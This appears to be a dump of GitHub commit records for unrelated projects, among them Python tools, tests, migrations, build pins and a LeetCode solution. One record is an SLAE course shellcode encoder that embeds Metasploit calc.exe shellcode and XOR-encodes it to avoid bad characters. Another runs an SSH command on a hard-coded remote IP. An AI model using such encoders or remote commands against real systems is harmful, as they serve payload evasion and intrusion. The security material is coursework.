        print('Fetching pages from 1 to %s' % max(pages))
        for page in pages:
            self._get_versions_from_page(slug, page)

    def _get_versions_from_page(self, slug, page):
        """Fetch one page of versions and import each entry.

        NOTE(review): `data` is always returned empty; presumably vestigial.
        """
        data = []
        print('fetching %s' % page)
        query_params = {
            'page': page
        }
        response = requests.get(
            self.VERSIONS_API_URL % {'slug': slug}, params=query_params)
        print('fetched %s' % page)
        for version in response.json()['results']:
            self._handle_version(version)
        return data

    def _download_file(self, url, file_):
        """Download *url* into the File object's expected storage path."""
        with storage.open(file_.current_file_path, 'wb') as f:
            data = requests.get(url)
            f.write(data.content)

    def _handle_version(self, data):
        """Create a local Version (+ File) from one API version record,
        skipping versions that already exist locally."""
        if self.addon.versions(manager='unfiltered_for_relations').filter(
                version=data['version']).exists():
            # NOTE(review): message is missing its closing parenthesis.
            print('Skipping %s (version already exists' % data['version'])
            return
        # Only the first file of the version is imported.
        files_data = data['files'][0]
        file_kw = {
            'hash': files_data['hash'],
            'filename': basename(urlparse(files_data['url']).path),
            'status': amo.STATUS_CHOICES_API_LOOKUP[files_data['status']],
            'platform': amo.PLATFORM_DICT[files_data['platform']].id,
            'size': files_data['size'],
            'is_webextension': files_data['is_webextension'],
            'is_mozilla_signed_extension': (
                files_data['is_mozilla_signed_extension']),
            'strict_compatibility': (
                data['is_strict_compatibility_enabled'])
        }
        version_kw = {
            'version': data['version'],
            # FIXME: maybe reviewed/created would make sense at least, to
            # get more or less the correct ordering ?
            # Everything else we don't really care about at the moment.
        }
        print('Creating version %s' % data['version'])
        with atomic():
            version = version_factory(
                addon=self.addon, file_kw=file_kw, **version_kw)
            # Download the file to the right path.
            print('Downloading file for version %s' % data['version'])
            self._download_file(files_data['url'], version.files.all()[0])
| bsd-3-clause | Python | |
275bf9c021c032b72c76010116aa05e0994ce631 | Add a basic test for loading grading records details overview page. | rhyolight/nupic.son,rhyolight/nupic.son,rhyolight/nupic.son | tests/app/soc/modules/gsoc/views/test_grading_record_details.py | tests/app/soc/modules/gsoc/views/test_grading_record_details.py | # Copyright 2013 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for grading record details views.
"""
from soc.modules.gsoc.logic import grading_record
from soc.modules.gsoc.models import grading_survey_group as gsg_model
from soc.modules.gsoc.models import project as project_model
from tests import profile_utils
from tests import survey_utils
from tests import test_utils
GRADING_SURVEY_GROUP_NAME = 'Test Grading Survey Group'
class GradingRecordsOverviewTest(test_utils.GSoCDjangoTestCase):
    """Test grading records overview list page."""

    def setUp(self):
        self.init()
        self.data.createHost()
        self.timeline.studentsAnnounced()

    def createGradingSurveyGroup(self):
        """Create the grading survey group used to manage evaluations."""
        evaluation_helper = survey_utils.SurveyHelper(self.gsoc, self.dev_test)
        properties = {
            'name': GRADING_SURVEY_GROUP_NAME,
            'program': self.program,
            'grading_survey': evaluation_helper.createMentorEvaluation(),
            'student_survey': evaluation_helper.createStudentEvaluation(),
        }
        return self.seed(gsg_model.GSoCGradingSurveyGroup, properties)

    def assertGradingRecordsOverviewTemplatesUsed(self, response):
        """Asserts that all templates of the grading records overview page
        were used and all contexts were passed.
        """
        self.assertTrue('base_layout' in response.context)
        self.assertGSoCTemplatesUsed(response)
        self.assertTemplateUsed(response,
            'v2/modules/gsoc/grading_record/overview.html')

    def testGradingRecordsOverviewGet(self):
        """GET renders the page; the list is empty until a project gets a
        grading record, then contains exactly one row."""
        grading_survey_group = self.createGradingSurveyGroup()
        url = '/gsoc/grading_records/overview/%s/%d' % (
            self.program.key().name(), grading_survey_group.key().id(),)
        response = self.get(url)
        self.assertResponseOK(response)
        self.assertGradingRecordsOverviewTemplatesUsed(response)
        # list response without any projects
        response = self.getListResponse(url, 0)
        self.assertIsJsonResponse(response)
        data = response.context['data']['']
        self.assertEqual(0, len(data))
        # list response with projects
        mentor_profile_helper = profile_utils.GSoCProfileHelper(
            self.gsoc, self.dev_test)
        mentor_profile_helper.createOtherUser('mentor@example.com')
        mentor = mentor_profile_helper.createMentor(self.org)
        self.data.createStudentWithProposal(self.org, mentor)
        self.data.createStudentWithProject(self.org, mentor)
        student_profile_helper = profile_utils.GSoCProfileHelper(
            self.gsoc, self.dev_test)
        student_profile_helper.createStudentWithProposal(self.org, mentor)
        student_profile_helper.createStudentWithProject(self.org, mentor)
        project = project_model.GSoCProject.all().ancestor(self.data.profile).get()
        grading_record.updateOrCreateRecordsFor(grading_survey_group, [project])
        response = self.getListResponse(url, 0)
        self.assertIsJsonResponse(response)
        data = response.context['data']['']
        self.assertEqual(1, len(data))
| apache-2.0 | Python | |
8e58bf21cf39892df07d42d650619e2292b8efb5 | Create new package (#7796) | EmreAtes/spack,mfherbst/spack,tmerrick1/spack,krafczyk/spack,LLNL/spack,matthiasdiener/spack,iulian787/spack,tmerrick1/spack,tmerrick1/spack,mfherbst/spack,iulian787/spack,krafczyk/spack,krafczyk/spack,krafczyk/spack,tmerrick1/spack,tmerrick1/spack,mfherbst/spack,EmreAtes/spack,matthiasdiener/spack,EmreAtes/spack,mfherbst/spack,LLNL/spack,EmreAtes/spack,iulian787/spack,iulian787/spack,matthiasdiener/spack,krafczyk/spack,mfherbst/spack,LLNL/spack,LLNL/spack,iulian787/spack,matthiasdiener/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack | var/spack/repos/builtin/packages/perl-statistics-pca/package.py | var/spack/repos/builtin/packages/perl-statistics-pca/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PerlStatisticsPca(PerlPackage):
    """A simple Perl implementation of Principal Component Analysis."""

    homepage = "http://search.cpan.org/~dsth/Statistics-PCA/lib/Statistics/PCA.pm"
    url = "http://search.cpan.org/CPAN/authors/id/D/DS/DSTH/Statistics-PCA-0.0.1.tar.gz"

    # Single released version, verified by MD5 checksum.
    version('0.0.1', '6e0e05fe13f6becea525b973a0c29001')

    # Module::Build drives the build; the rest are runtime CPAN deps.
    depends_on('perl-module-build', type='build')
    depends_on('perl-contextual-return', type=('build', 'run'))
    depends_on('perl-text-simpletable', type=('build', 'run'))
    depends_on('perl-math-matrixreal', type=('build', 'run'))
| lgpl-2.1 | Python | |
f6fc6960bf44c63fd854455efd3d5eff135d5877 | Fix failing build due to missing file | lassoan/SlicerSegmentEditorExtraEffects,lassoan/SlicerSegmentEditorExtraEffects | SegmentEditorSplitVolume/SegmentEditorSplitVolumeLib/__init__.py | SegmentEditorSplitVolume/SegmentEditorSplitVolumeLib/__init__.py | from SegmentEditorEffects.AbstractScriptedSegmentEditorEffect import *
from SegmentEditorEffects.AbstractScriptedSegmentEditorLabelEffect import *
from SegmentEditorEffect import *
| bsd-3-clause | Python | |
c81ecdf74f3e668559ed4c257e3cdfb1d95f376c | Add files via upload | bbarrows89/CSC110_Projects | myFirstPythonProgram.py | myFirstPythonProgram.py | # Bryan Barrows
# CSC 110 - 9830
# January 13th, 2017
# File: myFirstPythonProgram.py
# A simple program illustrating chaotic behavior.
def main():
    """Read a seed in (0, 1) and print 10 logistic-map iterations."""
    print("This program illustrates a chaotic function")
    # float() replaces eval(): eval executes arbitrary code typed by the
    # user, while float parses exactly the numeric input expected here.
    x = float(input("Enter a number between 0 and 1: "))
    for i in range(10):
        x = 3.9 * x * (1 - x)
        print(x)
main()
| mit | Python | |
f3eb56111c115e65db6e55fcd1c69d695178b33b | Integrate LLVM at llvm/llvm-project@6144fc2da1b8 | tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,frreiss/tensorflow-fred,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,Intel-tensorflow/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,gautam1858/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,gautam1858/tensorflow,gautam1858/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gautam1858/tensorflow,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-Corporation/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,Intel-Corporation/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,paolodedios/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,gautam1858/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-Corporation/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorfl
ow-pywrap_tf_optimizer,frreiss/tensorflow-fred,karllessard/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gautam1858/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,Intel-tensorflow/tensorflow,paolodedios/tensorflow,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,gautam1858/tensorflow,tensorflow/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gautam1858/tensorflow,karllessard/tensorflow,Intel-tensorflow/tensorflow,Intel-Corporation/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow,tensorflow/tensorflow,Intel-Corporation/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,frreiss/tensorflow-fred,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,karllessard/tensorflow,tensorflow/tensorflow | third_party/llvm/workspace.bzl | third_party/llvm/workspace.bzl | """Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "6144fc2da1b87dc64ff887d73b60f7708f5cb0a4"
LLVM_SHA256 = "e6fe7c8df75bc1d3fb5f29758431e056406542768dd48333d32675dd4e06f1aa"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-" + LLVM_COMMIT,
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
link_files = {
"//third_party/llvm:llvm.autogenerated.BUILD": "llvm/BUILD",
"//third_party/mlir:BUILD": "mlir/BUILD",
"//third_party/mlir:build_defs.bzl": "mlir/build_defs.bzl",
"//third_party/mlir:linalggen.bzl": "mlir/linalggen.bzl",
"//third_party/mlir:tblgen.bzl": "mlir/tblgen.bzl",
"//third_party/mlir:test.BUILD": "mlir/test/BUILD",
},
)
| """Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "eb03fa1d2c05bad5a5f75a89d47b4b31d84bb90b"
LLVM_SHA256 = "53260f7983218c72b07f905694505188695e94e4e68fb9f2959f89073724feac"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-" + LLVM_COMMIT,
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
link_files = {
"//third_party/llvm:llvm.autogenerated.BUILD": "llvm/BUILD",
"//third_party/mlir:BUILD": "mlir/BUILD",
"//third_party/mlir:build_defs.bzl": "mlir/build_defs.bzl",
"//third_party/mlir:linalggen.bzl": "mlir/linalggen.bzl",
"//third_party/mlir:tblgen.bzl": "mlir/tblgen.bzl",
"//third_party/mlir:test.BUILD": "mlir/test/BUILD",
},
)
| apache-2.0 | Python |
62b2c69482d36a7afcdb732dd70a037d2513ba51 | Add script to execute a simple command in a remote server over SSH | inakidelamadrid/bhp_exercises | bh_sshcmd.py | bh_sshcmd.py | import paramiko # pip install paramiko
import os
def ssh_command(ip, user, command):
# you can run this script as
# SSH_PRIV_KEY=[your private key path] python bh_sshcmd.py
key = paramiko.RSAKey.from_private_key_file(os.getenv('SSH_PRIV_KEY'))
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print "[==>connecting]"
client.connect(ip, username=user, pkey=key)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.exec_command(command)
print(ssh_session.recv(1024))
return
ssh_command('52.35.195.113', 'ubuntu', 'id')
| mit | Python | |
cb7b286d1aa9fc10669b1b59afe334995a4c1174 | add missed migration | taigaio/taiga-back,taigaio/taiga-back,taigaio/taiga-back | taiga/projects/userstories/migrations/0021_auto_20201202_0850.py | taiga/projects/userstories/migrations/0021_auto_20201202_0850.py | # Generated by Django 2.2.14 on 2020-12-02 08:50
from django.db import migrations, models
import taiga.base.utils.time
class Migration(migrations.Migration):
dependencies = [
('userstories', '0020_userstory_swimlane'),
]
operations = [
migrations.AlterField(
model_name='userstory',
name='backlog_order',
field=models.BigIntegerField(default=taiga.base.utils.time.timestamp_mics, verbose_name='backlog order'),
),
migrations.AlterField(
model_name='userstory',
name='kanban_order',
field=models.BigIntegerField(default=taiga.base.utils.time.timestamp_mics, verbose_name='kanban order'),
),
migrations.AlterField(
model_name='userstory',
name='sprint_order',
field=models.BigIntegerField(default=taiga.base.utils.time.timestamp_mics, verbose_name='sprint order'),
),
]
| agpl-3.0 | Python | |
74d094e1071f4fadffbb5f2351c4e171e528b68e | Update split-array-into-consecutive-subsequences.py | yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,yiwen-luo/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,yiwen-luo/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015 | Python/split-array-into-consecutive-subsequences.py | Python/split-array-into-consecutive-subsequences.py | # Time: O(n)
# Space: O(1)
# You are given an integer array sorted in ascending order (may contain duplicates),
# you need to split them into several subsequences,
# where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
pre, cur = float("-inf"), 0
cnt1, cnt2, cnt3 = 0, 0, 0
i = 0
while i < len(nums):
cnt = 0
cur = nums[i]
while i < len(nums) and cur == nums[i]:
cnt += 1
i += 1
if cur != pre + 1:
if cnt1 != 0 or cnt2 != 0:
return False
cnt1, cnt2, cnt3 = cnt, 0, 0
else:
if cnt < cnt1 + cnt2:
return False
cnt1, cnt2, cnt3 = max(0, cnt - (cnt1 + cnt2 + cnt3)), \
cnt1, \
cnt2 + min(cnt3, cnt - (cnt1 + cnt2))
pre = cur
return cnt1 == 0 and cnt2 == 0
| # Time: O(n)
# Space: O(1)
# You are given an integer array sorted in ascending order (may contain duplicates),
# you need to split them into several subsequences,
# where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
pre, cur = float("-inf"), 0
cnt1, cnt2, cnt3 = 0, 0, 0
i = 0
while i < len(nums):
cnt = 0
cur = nums[i]
while i < len(nums) and cur == nums[i]:
cnt += 1
i += 1
if cur != pre + 1:
if cnt1 != 0 or cnt2 != 0:
return False
cnt1, cnt2, cnt3 = cnt, 0, 0
else:
if cnt < cnt1 + cnt2:
return False
cnt1, cnt2, cnt3 = max(0, cnt - (cnt1 + cnt2 + cnt3)), \
cnt1, \
cnt2 + min(cnt3, cnt - (cnt1 + cnt2))
pre = cur
return cnt1 == 0 and cnt2 == 0
| mit | Python |
cea70bf2f04779376b6db1570e9df0c40944782d | Create linux_x86_custom_encoder_real_world.py | rcesecurity/slae,rcesecurity/slae,rcesecurity/slae | assignment-4/linux_x86_custom_encoder_real_world.py | assignment-4/linux_x86_custom_encoder_real_world.py | #!/usr/bin/python
# SLAE - Assignment #4: Custom Shellcode Encoder/Decoder (Linux/x86)
# Author: Julien Ahrens (@MrTuxracer)
# Website: http://www.rcesecurity.com
from random import randint
# powered by Metasploit
# windows/exec CMD=calc.exe
# msfvenom -p windows/exec CMD=calc.exe -f python -e generic/none
# Encoder: Custom
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
shellcode += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
badchars = ["\x00","\x0a","\x0d","\x3b"]
def xorBytes(byteArray):
# Randomize first byte
rnd=randint(1,255)
xor1=(rnd ^ byteArray[0])
xor2=(xor1 ^ byteArray[1])
xor3=(xor2 ^ byteArray[2])
xorArray=bytearray()
xorArray.append(rnd)
xorArray.append(xor1)
xorArray.append(xor2)
xorArray.append(xor3)
return cleanBadChars(byteArray, xorArray, badchars)
def cleanBadChars(origArray, payload, badchars):
for k in badchars:
# Ooops, BadChar found :( Do XOR stuff again with a new random value
# This could run into an infinite loop in some cases
if payload.find(k) >= 0:
payload=xorBytes(origArray)
return payload
def encodeShellcode (byteArr):
shellcode=bytearray()
shellcode.extend(byteArr)
encoded=bytearray()
tmp=bytearray()
final=""
# Check whether shellcode is aligned
if len(shellcode) % 3 == 1:
shellcode.append(0x90)
shellcode.append(0x90)
elif len(shellcode) % 3 == 2:
shellcode.append(0x90)
# Loop to split shellcode into 3-byte-blocks
for i in range(0,len(shellcode),3):
tmp_block=bytearray()
tmp_block.append(shellcode[i])
tmp_block.append(shellcode[i+1])
tmp_block.append(shellcode[i+2])
# Do the RND-Insertion and chained XORs
tmp=xorBytes(tmp_block)
# Some formatting things for easier use in NASM :)
for y in tmp:
if len(str(hex(y))) == 3:
final+=str(hex(y)[:2]) + "0" + str(hex(y)[2:])+","
else:
final+=hex(y)+","
return final[:-1]
print "Encoded Shellcode:\r"
print encodeShellcode(shellcode)
| mit | Python | |
615cb67e0082b6a2d2ab1c91623e9b2a20ddedec | create milestone migration for Havana release | glove747/liberty-neutron,CiscoSystems/vespa,antonioUnina/neutron,miyakz1192/neutron,openstack/neutron,vbannai/neutron,NeCTAR-RC/neutron,SamYaple/neutron,JianyuWang/neutron,redhat-openstack/neutron,vijayendrabvs/ssl-neutron,vijayendrabvs/hap,ntt-sic/neutron,Metaswitch/calico-neutron,yuewko/neutron,noironetworks/neutron,vijayendrabvs/ssl-neutron,Juniper/contrail-dev-neutron,vijayendrabvs/hap,swdream/neutron,mandeepdhami/neutron,cisco-openstack/neutron,gkotton/neutron,Comcast/neutron,sajuptpm/neutron-ipam,swdream/neutron,jerryz1982/neutron,CiscoSystems/neutron,pnavarro/neutron,leeseulstack/openstack,neoareslinux/neutron,ntt-sic/neutron,dims/neutron,silenci/neutron,citrix-openstack-build/neutron,alexandrucoman/vbox-neutron-agent,takeshineshiro/neutron,waltBB/neutron_read,cisco-openstack/neutron,magic0704/neutron,leeseuljeong/leeseulstack_neutron,asgard-lab/neutron,paninetworks/neutron,cernops/neutron,oeeagle/quantum,suneeth51/neutron,beagles/neutron_hacking,yanheven/neutron,CiscoSystems/vespa,eonpatapon/neutron,kaiweifan/neutron,silenci/neutron,shahbazn/neutron,jacknjzhou/neutron,huntxu/neutron,zhhf/charging,SmartInfrastructures/neutron,Stavitsky/neutron,vveerava/Openstack,SamYaple/neutron,citrix-openstack-build/neutron,NeCTAR-RC/neutron,waltBB/neutron_read,aristanetworks/neutron,CiscoSystems/neutron,huntxu/neutron,CiscoSystems/vespa,zhhf/charging,noironetworks/neutron,paninetworks/neutron,wenhuizhang/neutron,vijayendrabvs/ssl-neutron,yuewko/neutron,infobloxopen/neutron,mattt416/neutron,beagles/neutron_hacking,SmartInfrastructures/neutron,aristanetworks/neutron,blueboxgroup/neutron,bigswitch/neutron,wolverineav/neutron,zhhf/charging,gopal1cloud/neutron,jacknjzhou/neutron,pnavarro/neutron,jumpojoy/neutron,gopal1cloud/neutron,sajuptpm/neutron-ipam,bigswitch/neutron,dims/neutron,Stavitsky/neutron,eayunstack/neutron,rdo-management/neutron,Comcast/neutron,sasukeh/neutron,oeeagle/quantu
m,yamahata/tacker,sasukeh/neutron,skyddv/neutron,kaiweifan/neutron,CiscoSystems/neutron,adelina-t/neutron,projectcalico/calico-neutron,netscaler/neutron,mmnelemane/neutron,projectcalico/calico-neutron,eonpatapon/neutron,blueboxgroup/neutron,wenhuizhang/neutron,adelina-t/neutron,Juniper/neutron,netscaler/neutron,leeseulstack/openstack,chitr/neutron,openstack/neutron,antonioUnina/neutron,vivekanand1101/neutron,mandeepdhami/neutron,mahak/neutron,Juniper/neutron,sebrandon1/neutron,rickerc/neutron_audit,MaximNevrov/neutron,virtualopensystems/neutron,gkotton/neutron,Comcast/neutron,klmitch/neutron,ntt-sic/neutron,Juniper/contrail-dev-neutron,magic0704/neutron,sajuptpm/neutron-ipam,dhanunjaya/neutron,cloudbase/neutron,barnsnake351/neutron,skyddv/neutron,watonyweng/neutron,virtualopensystems/neutron,Metaswitch/calico-neutron,leeseuljeong/leeseulstack_neutron,mmnelemane/neutron,vbannai/neutron,miyakz1192/neutron,Juniper/neutron,vveerava/Openstack,klmitch/neutron,JioCloud/neutron,chitr/neutron,yamahata/neutron,leeseuljeong/leeseulstack_neutron,javaos74/neutron,infobloxopen/neutron,rickerc/neutron_audit,wolverineav/neutron,cernops/neutron,blueboxgroup/neutron,jumpojoy/neutron,vivekanand1101/neutron,shahbazn/neutron,gkotton/neutron,takeshineshiro/neutron,vveerava/Openstack,cloudbase/neutron,dhanunjaya/neutron,vbannai/neutron,yamahata/neutron,MaximNevrov/neutron,asgard-lab/neutron,kaiweifan/neutron,alexandrucoman/vbox-neutron-agent,citrix-openstack-build/neutron,netscaler/neutron,javaos74/neutron,apporc/neutron,virtualopensystems/neutron,watonyweng/neutron,mahak/neutron,rickerc/neutron_audit,redhat-openstack/neutron,JianyuWang/neutron,yanheven/neutron,mahak/neutron,barnsnake351/neutron,igor-toga/local-snat,cloudbase/neutron-virtualbox,JioCloud/neutron,bgxavier/neutron,apporc/neutron,neoareslinux/neutron,glove747/liberty-neutron,mattt416/neutron,sebrandon1/neutron,leeseulstack/openstack,yamahata/tacker,beagles/neutron_hacking,vijayendrabvs/hap,bgxavier/neutron,Juniper/contrail-de
v-neutron,eayunstack/neutron,igor-toga/local-snat,openstack/neutron,jerryz1982/neutron,cloudbase/neutron-virtualbox,yamahata/tacker,suneeth51/neutron,rdo-management/neutron,yamahata/neutron | neutron/db/migration/alembic_migrations/versions/havana_release.py | neutron/db/migration/alembic_migrations/versions/havana_release.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""havana
Revision ID: havana
Revises: 1341ed32cc1e
Create Date: 2013-10-02 00:00:00.000000
"""
# revision identifiers, used by Alembic.
revision = 'havana'
down_revision = '3a520dd165d0'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = ['*']
def upgrade(active_plugins=None, options=None):
"""A no-op migration for marking the Havana release."""
pass
def downgrade(active_plugins=None, options=None):
"""A no-op migration for marking the Havana release."""
pass
| apache-2.0 | Python | |
e5247e1123ecd2e5ea1d98668ceded22d99c1c42 | Create twitter-auth.py | timbennett/twitter-tools | twitter-auth.py | twitter-auth.py | # paste your apps.twitter.com keys in here
access_key = ""
access_secret = ""
consumer_key = ""
consumer_secret = ""
| mit | Python | |
f63747a7e19b82a59d7ff1435725c3f35a4ba61b | Add contex processor to use cart in any template | samitnuk/online_shop,samitnuk/online_shop,samitnuk/online_shop | apps/cart/context_processors.py | apps/cart/context_processors.py | from .cart import Cart
def cart(request):
return {'cart': Cart(request)}
| mit | Python | |
